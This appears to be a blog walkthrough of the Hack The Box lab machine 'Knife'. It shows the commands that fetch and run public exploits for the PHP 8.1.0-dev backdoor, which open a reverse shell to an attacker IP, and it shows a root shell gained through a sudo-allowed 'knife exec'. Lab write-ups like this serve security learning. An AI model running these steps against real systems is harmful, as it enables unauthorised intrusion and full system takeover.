Walkthrough for Knife

Reconnaissance

As always, started with nmap scan

nmap output shows two ports are open, 22 and 80. To enumerate further I installed, wapaalyzer which is a tool to gather technical details of a website.

To install this on firefox

Go go about:debugging#/runtime/this-firefoxClick ‘Load Temporary Add-on’Select src/drivers/webextension/manifest.json from the folder where waplyzer is downloaded.

When installed it shows below message,

If we click on the small icon on right hand side it gives information about the technology.

Its using php 8.1.0, which is affected with a backdoor. An attacker can execute arbitrary code by sending the User-Agent header. More information and interesting story about this exploit is written in the below given blog,

https://flast101.github.io/php-8.1.0-dev-backdoor-rce/

Two scripts need to be downloaded to get reverse shell from the exploit.

POC script from this link

and also the reverse shell exploit from here.

wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/backdoor_php_8.1.0-dev.pywget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py

Now you have both the exploits in your directory,

python3 backdoor_php_8.1.0-dev.py
python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

And we get the user !

Privilage Escalation

sudo -l command will list the sudo privilages of the user.

sudo -l

The user is allowed to execute knife command with root user’s privilege.

About knife

knife includes a collection of built in subcommands that work together to provide all of the functionality required to take specific actions against any object in an organization, including cookbooks, nodes, roles, data bags, environments, and users.

I tried to add / edit user and few other things with knife command. If there’s. a way to perform code execution with knife command, then we can write a simple code to spawn shell which will run with root’s privilages. THe link https://docs.chef.io/workstation/knife_exec/ has good references for the same.

knife exec -E 'RUBY CODE'

To execute a shell in ruby, we’ll write ‘exec “/bin/bash”;

knife exec -E ‘exec “/bin/bash”;’

And grab the flag !

Skills and Lessons I learnt from this machine

I learnt to use the Wappalyser tool, plus how to execute the publicly available exploits and how to escalate privileges by abusing the functionality of a tool (knife) thats accessible to the user with sudo rights.

The lessions tell why one should not use a vulnerable software. The story behind exploit is also a good example, why secure version of TLS and secure hashing algorithm should be used for storing passwords.

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Privacy in a post-COVID world

Today the World Safe ($WDS) token is born. Hopefully it will be a good start

The Pipeline Attack — Is Log Analysis Enough for Cybersecurity?

{UPDATE} Politiewagenspelen ! Hack Free Resources Generator

It’s hard for a CISO to make predictions, especially about the future

How to get started with Microsoft Azure AZ-500 Exam?

{UPDATE} ESP Trainer Hack Free Resources Generator

Exploiting XXE for SSRF

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sheetal Patil

Sheetal Patil

More from Medium

FALL Vulnhub Walkthrough

Investigating IoT Security

Getting Your Hands Dirty: Exploiting Buffer Overflow Vulnerability In C

HTB:Chatterbox Walkthrough